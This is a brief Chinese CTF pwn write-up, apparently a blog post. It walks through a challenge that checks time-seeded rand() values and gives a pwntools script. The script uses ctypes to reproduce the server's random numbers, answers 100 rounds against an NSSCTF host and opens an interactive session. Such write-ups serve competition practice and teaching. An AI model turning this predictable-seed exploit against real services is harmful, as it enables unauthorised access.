本文介绍了如何使用Python的ctypes模块在远程服务器上执行简单的代码逻辑,涉及用户名输入、随机数生成,以及与服务器交互的过程,展示了程序保护的基本概念。
查一下程序保护状态
保护全开,看一下代码逻辑
逻辑比较简单,就是输入一个用户名,然后进行随机数运算,这里可以使用ctypes模块,形成和服务器那边一模一样的随机数
from pwn import *
import ctypes
context(os='linux',arch='amd64',log_level='debug')
io=remote("node5.anna.nssctf.cn",28750)
libc=ctypes.CDLL("libc.so.6")
io.recvuntil(b"there?\n")
io.sendline(b"gg")
seed=libc.time(0)
libc.srand(seed)
for i in range(100):
tmp=libc.rand()%100000+1
io.sendlineafter(b"What is it?",str(tmp))
io.interactive()
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
